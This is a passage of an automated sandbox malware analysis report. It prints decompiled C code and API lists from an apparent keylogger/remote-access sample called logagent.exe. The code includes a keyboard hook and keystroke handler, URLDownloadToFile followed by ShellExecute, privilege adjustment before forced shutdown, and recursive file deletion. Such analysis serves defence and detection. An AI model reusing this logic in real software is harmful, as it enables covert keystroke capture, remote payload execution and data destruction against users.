						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L17;
						} else {
							L7:
							 *_t83( &_v532,  &_v1052);
							goto L14;
						}
					}
					if(E1055457D( &_v532) == 0) {
						goto L17;
					}
					 *_t73( &_v532);
					goto L7;
					L14:
				} while (_v5 != 0);
				FindClose(_v12);
				return  *_t73(_a4);
			}












                                  0x10554588
                                  0x10554599
                                  0x1055459b
                                  0x105545ad
                                  0x105545b9
                                  0x105545c7
                                  0x105545da
                                  0x105545e3
                                  0x105545e6
                                  0x105546e1
                                  0x00000000
                                  0x105546e1
                                  0x105545fa
                                  0x105545fc
                                  0x10554604
                                  0x10554608
                                  0x1055461a
                                  0x105546b5
                                  0x105546d8
                                  0x105546db
                                  0x00000000
                                  0x105546db
                                  0x105546b7
                                  0x00000000
                                  0x105546b7
                                  0x1055462f
                                  0x00000000
                                  0x00000000
                                  0x10554643
                                  0x1055464e
                                  0x10554685
                                  0x10554693
                                  0x10554693
                                  0x105546a8
                                  0x00000000
                                  0x105546aa
                                  0x1055466a
                                  0x10554678
                                  0x00000000
                                  0x1055467b
                                  0x105546a8
                                  0x1055465f
                                  0x00000000
                                  0x00000000
                                  0x10554668
                                  0x00000000
                                  0x105546bb
                                  0x105546bb
                                  0x105546c8
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 105545DA
                                  • FindNextFileW.KERNEL32(10545F55,?), ref: 10554612
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 10554693
                                  • DeleteFileW.KERNEL32(?), ref: 105546A0
                                  • GetLastError.KERNEL32 ref: 105546AC
                                  • FindClose.KERNEL32(10545F55), ref: 105546C8
                                  • FindClose.KERNEL32(10545F55), ref: 105546DB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$Close$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 1899391700-0
                                  • Opcode ID: 1cba246bc881a566288f4ba8d1b2c1b722db2d7294ca736c60c7400bc1a36b4e
                                  • Instruction ID: ccb0687570c2fee638a1422efabf09f102552a5550201e5eff52d51d27d76280
                                  • Opcode Fuzzy Hash: 1cba246bc881a566288f4ba8d1b2c1b722db2d7294ca736c60c7400bc1a36b4e
                                  • Instruction Fuzzy Hash: AE412772D4421CAADB11DBA0DC88BCA7FBDEB45258F1045A6E504E3050EBB19AD88F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EC0F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040EC0F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                  0x0040ec23
                                  0x0040ec35
                                  0x0040ec46
                                  0x0040ec4d
                                  0x0040ec54
                                  0x0040ec5a
                                  0x0040ec62
                                  0x0040ec68

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10548C1E Relevance: 9.2, APIs: 6, Instructions: 206fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • getenv.MSVCRT ref: 10548C68
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 10548CBD
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 10548CD7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileFirstgetenv
                                  • String ID:
                                  • API String ID: 41612390-0
                                  • Opcode ID: 23e045838b98cf7888df67748a30d3d3fe5417b4665ba54d6068558ccc242094
                                  • Instruction ID: 0a7370c0ef7a246f1ad01f4d103f94e5a64f5556adf6339adbdaf7091d039bad
                                  • Opcode Fuzzy Hash: 23e045838b98cf7888df67748a30d3d3fe5417b4665ba54d6068558ccc242094
                                  • Instruction Fuzzy Hash: 01714D71C0064EEBCB009BE0DC99AEEBF7CEF55655F104561E912D31A0EB705A8ECB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054F910 Relevance: 9.1, APIs: 6, Instructions: 114libraryloadershutdownCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 27%
                                  			E1054F910(void* __eflags) {
				void* _t13;
				void* _t14;
				_Unknown_base(*)()* _t20;
				int _t24;
				int _t33;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t71;
				void* _t73;
				void* _t76;

				_t76 = __eflags;
				E1055059E();
				_t13 = E1054319B(_t73 - 0x10, _t76, 0);
				_t71 =  *0x4152c4;
				_t14 =  *_t71(_t13, 0x415b14);
				_t77 = _t14;
				if(_t14 == 0) {
					__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415908);
					if(__eflags == 0) {
						__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b18);
						if(__eflags == 0) {
							_t20 = GetProcAddress(LoadLibraryA(0x41695c), 0x41696c);
							_t69 = _t20;
							__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b1c);
							if(__eflags == 0) {
								_t24 =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b20);
								__eflags = _t24;
								if(_t24 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L9;
								}
							} else {
								_push(0);
								_push(0);
								_push(0);
								L9:
								 *_t69();
							}
						} else {
							E1054319B(_t73 - 0x10, __eflags, 1);
							_t33 = atoi( *0x415344(0)) | 0x00000002;
							__eflags = _t33;
							goto L6;
						}
					} else {
						E1054319B(_t73 - 0x10, __eflags, 1);
						_t33 = atoi( *0x415344(0)) | 0x00000001;
						goto L6;
					}
				} else {
					E1054319B(_t73 - 0x10, _t77, 1);
					_t33 = atoi( *0x415344(0));
					L6:
					ExitWindowsEx(_t33, ??);
				}
				E1054316C(_t73 - 0x10);
				 *0x415348();
				 *0x415348();
				return 0;
			}












                                  0x1054f910
                                  0x1054f910
                                  0x1054f920
                                  0x1054f925
                                  0x1054f92c
                                  0x1054f92f
                                  0x1054f932
                                  0x1054f963
                                  0x1054f966
                                  0x1054f999
                                  0x1054f99c
                                  0x1054f9d8
                                  0x1054f9e7
                                  0x1054f9f2
                                  0x1054f9f5
                                  0x1054fa10
                                  0x1054fa13
                                  0x1054fa16
                                  0x1054fa1c
                                  0x1054fa1d
                                  0x1054fa1e
                                  0x00000000
                                  0x1054fa1e
                                  0x1054f9f7
                                  0x1054f9f7
                                  0x1054f9f8
                                  0x1054f9f9
                                  0x1054f9fa
                                  0x1054f9fa
                                  0x1054f9fa
                                  0x1054f99e
                                  0x1054f9a4
                                  0x1054f9b9
                                  0x1054f9b9
                                  0x00000000
                                  0x1054f9b9
                                  0x1054f968
                                  0x1054f96e
                                  0x1054f983
                                  0x00000000
                                  0x1054f983
                                  0x1054f934
                                  0x1054f93a
                                  0x1054f948
                                  0x1054f9bb
                                  0x1054f9bc
                                  0x1054f9bc
                                  0x10550033
                                  0x1055003b
                                  0x10550044
                                  0x10550050

                                  APIs
                                    • Part of subcall function 1055059E: GetCurrentProcess.KERNEL32(00000028,?), ref: 105505AB
                                    • Part of subcall function 1055059E: OpenProcessToken.ADVAPI32(00000000), ref: 105505B2
                                    • Part of subcall function 1055059E: LookupPrivilegeValueA.ADVAPI32(00000000,004169D0,?), ref: 105505C4
                                    • Part of subcall function 1055059E: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 105505E3
                                    • Part of subcall function 1055059E: GetLastError.KERNEL32 ref: 105505E9
                                  • atoi.MSVCRT ref: 1054F948
                                  • atoi.MSVCRT ref: 1054F97C
                                  • ExitWindowsEx.USER32(00000000), ref: 1054F9BC
                                  • LoadLibraryA.KERNEL32(0041695C,0041696C), ref: 1054F9D1
                                  • GetProcAddress.KERNEL32(00000000), ref: 1054F9D8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessTokenatoi$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                  • String ID:
                                  • API String ID: 2762080774-0
                                  • Opcode ID: bcd75714e71d07cfb2579d6033bc63b97b0b81c53cbe608d0d153417bcfa8dfa
                                  • Instruction ID: b90afeeac3f5e40fabd114fd8f0a6e2e853ea401072efdcd12fc479eee4ea3d7
                                  • Opcode Fuzzy Hash: bcd75714e71d07cfb2579d6033bc63b97b0b81c53cbe608d0d153417bcfa8dfa
                                  • Instruction Fuzzy Hash: CE312276950619EACF049BF4EC9DEEE7B2CEF95295B208826F102E20E1EF746845C714
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                  0x00409d16
                                  0x00409d22
                                  0x00409d2d
                                  0x00409d37
                                  0x00409d3b

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055059E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E1055059E() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _t14;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, 0x4169d0,  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				_t14 = GetLastError();
				asm("sbb eax, eax");
				return  ~( ~_t14);
			}







                                  0x105505b2
                                  0x105505c4
                                  0x105505d5
                                  0x105505dc
                                  0x105505e3
                                  0x105505e9
                                  0x105505f1
                                  0x105505f7

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 105505AB
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 105505B2
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,004169D0,?), ref: 105505C4
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 105505E3
                                  • GetLastError.KERNEL32 ref: 105505E9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID:
                                  • API String ID: 3534403312-0
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054EE74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 1054EF14
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000,?,00000000), ref: 1054EF4F
                                  • ??3@YAXPAX@Z.MSVCRT ref: 1054EFD2
                                    • Part of subcall function 10554210: ??2@YAPAXI@Z.MSVCRT ref: 1055422A
                                    • Part of subcall function 10554210: ??3@YAXPAX@Z.MSVCRT ref: 10554275
                                  Strings
                                  • C:\Windows\SysWOW64\logagent.exe, xrefs: 1054EFC5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@$??2@DownloadExecuteFileShell
                                  • String ID: C:\Windows\SysWOW64\logagent.exe
                                  • API String ID: 1851352135-431875223
                                  • Opcode ID: da1d121823f736652dcabd748f57677f53e9c544eabdd7e42c2b56f8cba21452
                                  • Instruction ID: 59b5f547a7ff231e4e57488f7a49ed13b5ff250d1baaf8499415d9b0fb9dbfa7
                                  • Opcode Fuzzy Hash: da1d121823f736652dcabd748f57677f53e9c544eabdd7e42c2b56f8cba21452
                                  • Instruction Fuzzy Hash: 82415076910518EBCB059BE0EC9DEEE7B78EF94341F50886AF516E30A0EF706948CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546C64 Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E10546C64(intOrPtr* __ecx) {
				struct tagMSG _v32;
				intOrPtr* _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *__ecx != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					 *_t14 = SetWindowsHookExA(0xd, 0x4052ba, 0, 0);
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}





                                  0x10546c6c
                                  0x10546c70
                                  0x10546c78
                                  0x10546c8f
                                  0x10546c9e
                                  0x10546ca4
                                  0x10546cae
                                  0x00000000
                                  0x10546cae
                                  0x10546c7a
                                  0x10546c89
                                  0x10546c8b
                                  0x10546c8d
                                  0x00000000
                                  0x00000000
                                  0x10546c8d
                                  0x10546cbb

                                  APIs
                                  • SetWindowsHookExA.USER32(0000000D,004052BA,00000000,00000000), ref: 10546C83
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10546C96
                                  • TranslateMessage.USER32(?), ref: 10546CA4
                                  • DispatchMessageA.USER32(?), ref: 10546CAE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 145b80978c2e18676703df7a4d65f34b7861883bf30e3a53eb5e384c536dff62
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: CCF03071900606EBC7209FA6DD4CECBBFFCEBD5B42720453AA485D2055E6748441CB75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546599 Relevance: 4.7, APIs: 3, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546606
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 1054662C
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 1054680C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 32b674cc9de47bdb2a48e67103b04d5011ae93aaacbb80d256926fcc8fede925
                                  • Instruction ID: c1d1a9eadd3be9a5cc074b44416464c015d45ca05f0af3c7d864d0bb3806b890
                                  • Opcode Fuzzy Hash: 32b674cc9de47bdb2a48e67103b04d5011ae93aaacbb80d256926fcc8fede925
                                  • Instruction Fuzzy Hash: C2711E7280050EEBCB04EBA0EC999EE7B78EF54345F548166F512E30A0EB745649CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040532D Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
				void* _t19;
				void* _t26;
				struct HHOOK__** _t32;
				signed int _t33;

				_t32 = _a4;
				_t33 = 5;
				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
				if(_a8 == 0) {
					_t19 = _a12 - 0x100;
					if(_t19 == 0) {
						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
							_t32[0xb] = _t32[0xb] & 0x00000000;
						} else {
							_t32[0xb] = 1;
						}
						E00406BA7(_t32);
						E00406BCB(_t32);
						E00405EB2(_t32);
						if(_t32[0xb] == 0) {
							E00406952(_t32);
						}
						_t32[0xb] = _t32[0xb] & 0x00000000;
					} else {
						_t26 = _t19 - 1;
						if(_t26 == 0) {
							E00406BB9(_t32);
							E00406BDD(_t32);
							E00406B61(_t32);
						} else {
							if(_t26 == 3) {
								E00406AD1(_t32);
							}
						}
					}
				}
				return CallNextHookEx( *_t32, _a8, _a12, _a16);
			}







                                  0x00405335
                                  0x00405342
                                  0x00405343
                                  0x00405345
                                  0x0040534a
                                  0x0040534f
                                  0x00405386
                                  0x00405398
                                  0x00405392
                                  0x00405392
                                  0x00405392
                                  0x0040539e
                                  0x004053a5
                                  0x004053ac
                                  0x004053b5
                                  0x004053b9
                                  0x004053b9
                                  0x004053be
                                  0x00405351
                                  0x00405351
                                  0x00405352
                                  0x00405364
                                  0x0040536b
                                  0x00405372
                                  0x00405354
                                  0x00405357
                                  0x0040535b
                                  0x0040535b
                                  0x00405357
                                  0x00405352
                                  0x0040534f
                                  0x004053d7

                                  APIs
                                  • GetKeyState.USER32 ref: 00405381
                                  • GetKeyState.USER32 ref: 0040538A
                                    • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                  • CallNextHookEx.USER32 ref: 004053CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                  • String ID:
                                  • API String ID: 98962008-0
                                  • Opcode ID: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction ID: db2238219e7acabf410f467048d0031229e8bae0499535dbb57e9f22420807a3
                                  • Opcode Fuzzy Hash: c30bd8d7f5eb3adc70798307367016ec926e5b8f9707ec8e3c3983b96fba1221
                                  • Instruction Fuzzy Hash: A0118E7520461996DF10AF3588817AF3A21EB85344F05547EB9426A2C2CABC98259B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10554D8D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 10554F0F
                                    • Part of subcall function 1054D097: RegCreateKeyA.ADVAPI32(10544B0B,80000001,80000001), ref: 1054D0A4
                                    • Part of subcall function 1054D097: RegSetValueExA.ADVAPI32(80000001,1054D2D7,00000000,?,00000000,?,1054D2D7,80000001,10544B0B,?,?,?,?,00000000), ref: 1054D0D0
                                    • Part of subcall function 1054D097: RegCloseKey.ADVAPI32(80000001,?,1054D2D7,80000001,10544B0B,?,?,?,?,00000000), ref: 1054D0DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop
                                  • API String ID: 4127273184-27424756
                                  • Opcode ID: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                  • Instruction ID: 65f9385c3bef0d29ef4b54e8f476fba7f87e436dfd601ce520c0619164863f24
                                  • Opcode Fuzzy Hash: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                  • Instruction Fuzzy Hash: 3041E936B50208BBEB1076A49C8BFEF3D3DDBC0750F110056F9159B1C0EAA65A8447EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10551F15 Relevance: 1.8, APIs: 1, Instructions: 279fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000), ref: 1055217E
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateFindFirst
                                  • String ID:
                                  • API String ID: 41799849-0
                                  • Opcode ID: 29dfd08cac935525e194297bb2b6ff9530471a542e089813cab2a41ff7bd284c
                                  • Instruction ID: cc21ef633f3382e49ece5fd0496077f0ec07c73ee919e3918cca91614f9089bb
                                  • Opcode Fuzzy Hash: 29dfd08cac935525e194297bb2b6ff9530471a542e089813cab2a41ff7bd284c
                                  • Instruction Fuzzy Hash: 10B1FB72D0050DEBCB04EBA0EC59EEEBB7CEF54245F148166F516A30A0EB746A49CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10544CB4 Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000), ref: 10544CD1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 8dcb216ad44b1f45a83daa5b669e69c72900e8f2089c73d5f45497b925a001b9
                                  • Instruction ID: bb1135f6e1ca62a2e60aa2555fd08207f31fd70920e7a0356f32943d8581113f
                                  • Opcode Fuzzy Hash: 8dcb216ad44b1f45a83daa5b669e69c72900e8f2089c73d5f45497b925a001b9
                                  • Instruction Fuzzy Hash: 6641EA7680050DEBCF44ABA0DC59DEEBF7CEB98255F404166F512D30A0EF70A689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405156 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405156(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                  0x00405157
                                  0x0040515b
                                  0x00405163
                                  0x00405168
                                  0x0040516c
                                  0x0040517b
                                  0x0040517b
                                  0x0040517f
                                  0x0040516e
                                  0x00405170
                                  0x00405174
                                  0x00000000
                                  0x00405176
                                  0x00405176
                                  0x0040517a
                                  0x0040517a
                                  0x00405174

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040515B
